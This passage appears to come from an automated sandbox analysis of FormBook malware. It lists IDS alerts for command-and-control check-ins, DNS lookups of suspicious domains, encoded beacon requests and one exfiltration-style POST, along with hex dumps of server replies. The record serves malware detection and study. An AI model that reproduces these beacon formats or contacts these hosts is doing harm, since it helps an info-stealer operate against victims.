            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49726 -> 154.213.157.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49710 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49714 -> 91.184.0.111:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49719 -> 193.108.130.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49741 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49712 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49724 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49735 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49720 -> 193.108.130.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49739 -> 198.12.241.35:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49734 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49715 -> 91.184.0.111:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49747 -> 31.186.11.254:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49717 -> 193.108.130.23:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49749 -> 192.250.231.28:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49751 -> 192.250.231.28:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49748 -> 31.186.11.254:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49709 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49713 -> 91.184.0.111:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49752 -> 192.250.231.28:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49716 -> 91.184.0.111:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49755 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49738 -> 198.12.241.35:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49721 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49744 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49737 -> 198.12.241.35:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49728 -> 154.213.157.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49730 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49729 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49732 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49718 -> 193.108.130.23:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49740 -> 198.12.241.35:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49725 -> 154.213.157.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49754 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49727 -> 154.213.157.32:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49711 -> 199.192.19.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49743 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49750 -> 192.250.231.28:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49707 -> 217.70.184.50:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49746 -> 31.186.11.254:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49756 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49722 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49742 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49731 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49733 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.10:49736 -> 91.195.240.19:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49723 -> 47.239.13.172:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49745 -> 31.186.11.254:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49753 -> 47.239.13.172:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.grafiktema.xyz
            Source: Joe Sandbox ViewIP Address: 91.184.0.111 91.184.0.111
            Source: Joe Sandbox ViewIP Address: 198.12.241.35 198.12.241.35
            Source: Joe Sandbox ViewIP Address: 192.250.231.28 192.250.231.28
            Source: Joe Sandbox ViewASN Name: HOSTNETNL HOSTNETNL
            Source: Joe Sandbox ViewASN Name: AS-26496-GO-DADDY-COM-LLCUS AS-26496-GO-DADDY-COM-LLCUS
            Source: Joe Sandbox ViewASN Name: CNSV-LLCUS CNSV-LLCUS
            Source: Joe Sandbox ViewASN Name: GANDI-ASDomainnameregistrar-httpwwwgandinetFR GANDI-ASDomainnameregistrar-httpwwwgandinetFR
            Source: Joe Sandbox ViewASN Name: SVK-ASCZ SVK-ASCZ
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /p2ly/?bFGXGTdX=854srIWxIbaR7EG2BVBjn1PfwNbGMwTqcAT48G/3DKSB08gEc85mKKLIvkpoComultp7rI80f5482EKJDc++UJ/X9hbLrPJpiCWZeROTRI35j/SOzA==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.goodgiftguru.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /oxoz/?bFGXGTdX=2tfclvLQdcOBJmGnIZVAP5JMnkUnnIVvl5+7iv031/ylbgKII8HkCnHT6NNgDVU8buPmA9RxJ1d+vIxyZHsoGN30KfBqGUlKbJLPWs8oJbYVBexVLA==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.fardvuss.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /sid8/?bFGXGTdX=cgqWRxBHisZEfk4b7YR89gpEuwk5o8UHHlGjArh/bwghFTR5hpE/+eDIKv47LadViiJNA0l9U7AJcEYo6/DJIlnE312L8+JFdumWlHM1LGtkr/t6bg==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.vacaturecast.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /6iyv/?bFGXGTdX=QUgjltNnPM7fQ1+0bKwVMbQ54EaLfCpy+OUhi4BxQU9uhqAfHapQDk2a3aAnmDcuDNg9UdkAVeopJ3fRxVhQVT9mj+0/2IqVm/xmg09egO+B+lk9Mw==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.drivemktg.coConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /bqpw/?bFGXGTdX=7i7mgMVoUdn3K3H4hxR2Z2sx7NMDmz1WBuojPjrSQrb0L6/7xSQOb69NgDz1ThGB8kqobNNV7CaIX5kMC3tpqGoJwELsf5+TzHoCpSOUthnHuH68iQ==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.nbh6agr8h.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /qii2/?bFGXGTdX=MyAnEvAqgx9IHgh7O1f7tHhASGGjAfpU9Y1SDE6GUOU+/QpZ0wdWe4W7KVnq9zWaa6WrnYnil8yz0OBRRbaeb4KuJn8nSoXQG6ZxMFNQIXEXLDmqOQ==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.54bxd.cyouConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /zqqa/?bFGXGTdX=ZXXpLVL5zGXuIyziXd74rR8Z9u95/Dmogjom9+EAQEp6mmLdAUlPVhz6U9vRTuA6wBlP9h+HTHItH2gyziEy2Gmm5hf6oNdAA8n0WZPfrmRJWLBYJQ==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.r7xzr3ib0.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /zwgt/?bFGXGTdX=dCUrqoNNqYa01jj8ucmLyHx7kNIUn0PrfHpa8tjXz+CKp9k6oQP/Fdto1b0bQ/emz29BsG965J3wVz+jeRQuKqDu3O+8XeswSZaKGjOqnVkBxijyaA==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.bitmapsportsbook.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /9og3/?bFGXGTdX=ZBkskPBELyIjvtDi08MWm9rbu3iLorcPFzn2FRxS1jOC36b61Sx96mOK+r72OxgWH8wd7wLlO4AB5vUmoL6nk1FBVggKsZuxPhO/hPMpvJNZBalqpQ==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.aceautocorp.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /rlev/?bFGXGTdX=Wo1R3wm8Ej8entDC+cV4KaEDP0IDvxtNKgFdfJiYIIGalaQSkKKZ1Xkt0Su2x108KR/fnP4QiNVkos1WTd/84fgdAaOORrOEsxtw8yTuzQl5BJwg/A==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.purpleheartlacey.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /pt32/?bFGXGTdX=y3myQPKMG7UG4U86kYjDSgzezXSmAkUzi6cKVm8KTXszLa2xdxq+NpYfRMeTkluAfKxM8yJJ9pAbryr3svtYXqMrD5rBnUtNlc/QUHCATHSaLBoyFg==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.grafiktema.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /o1v8/?bFGXGTdX=1i6yDzrkvfTg1xRY+mVcmT0mAxqtzWYSPwzr6OqMIexmyiVm05r+M/L0QtcaHGif89shAFkQDwq9CioCdeM2s5RrcMFZtF0WLInyLOarA44qlhj6rw==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.cr-pos.comConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /d8su/?bFGXGTdX=3HBCjYMba2FPA3TIMZ366tJLR19IJjxz0bIsDTYva69fDAgKwrpmDBuz3X8ZHGWOiFUXNC9bte/eip1p2XCq457JVfW7M++UWZyl/bQwgvBliJsYpA==&M87d=RDddFbF8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usHost: www.trcrb8e8m.sbsConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.make-l.ru
            Source: global trafficDNS traffic detected: DNS query: www.goodgiftguru.com
            Source: global trafficDNS traffic detected: DNS query: www.fardvuss.top
            Source: global trafficDNS traffic detected: DNS query: www.vacaturecast.com
            Source: global trafficDNS traffic detected: DNS query: www.drivemktg.co
            Source: global trafficDNS traffic detected: DNS query: www.nbh6agr8h.sbs
            Source: global trafficDNS traffic detected: DNS query: www.54bxd.cyou
            Source: global trafficDNS traffic detected: DNS query: www.r7xzr3ib0.sbs
            Source: global trafficDNS traffic detected: DNS query: www.bitmapsportsbook.com
            Source: global trafficDNS traffic detected: DNS query: www.aceautocorp.com
            Source: global trafficDNS traffic detected: DNS query: www.purpleheartlacey.com
            Source: global trafficDNS traffic detected: DNS query: www.cityrentsatruck.com
            Source: global trafficDNS traffic detected: DNS query: www.grafiktema.xyz
            Source: global trafficDNS traffic detected: DNS query: www.cr-pos.com
            Source: global trafficDNS traffic detected: DNS query: www.trcrb8e8m.sbs
            Source: global trafficDNS traffic detected: DNS query: www.sulpapeis.online
            Source: unknownHTTP traffic detected: POST /oxoz/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Encoding: gzip, deflate, brAccept-Language: en-usHost: www.fardvuss.topOrigin: http://www.fardvuss.topContent-Length: 197Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: max-age=0Referer: http://www.fardvuss.top/oxoz/User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Raw: 62 46 47 58 47 54 64 58 3d 37 76 33 38 6d 61 43 50 57 36 75 62 44 48 4f 2b 4b 37 6c 44 43 72 49 75 6f 47 63 44 78 38 35 68 6d 4a 6d 61 36 4f 59 4f 6c 4d 4b 48 55 41 75 70 59 4e 6a 6f 44 52 50 6e 67 75 34 37 51 69 59 6d 64 71 79 34 61 75 5a 72 49 52 4e 7a 70 36 73 42 5a 6d 6b 42 4c 74 48 4c 49 36 49 58 42 56 55 55 55 71 72 67 51 63 31 47 58 4b 5a 6c 58 35 70 39 58 6d 54 44 66 41 4b 66 46 35 35 59 52 46 75 70 48 34 6e 64 53 31 69 78 37 4a 47 38 34 51 30 6c 63 41 76 43 4a 39 37 41 4a 65 4d 2f 57 72 6e 79 37 4f 32 67 78 74 6d 32 6b 58 48 5a 49 4c 6d 4d 66 47 68 62 75 6d 70 76 66 52 34 73 Data Ascii: bFGXGTdX=7v38maCPW6ubDHO+K7lDCrIuoGcDx85hmJma6OYOlMKHUAupYNjoDRPngu47QiYmdqy4auZrIRNzp6sBZmkBLtHLI6IXBVUUUqrgQc1GXKZlX5p9XmTDfAKfF55YRFupH4ndS1ix7JG84Q0lcAvCJ97AJeM/Wrny7O2gxtm2kXHZILmMfGhbumpvfR4s
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:03:05 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 11 Sep 2024 20:03:08 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 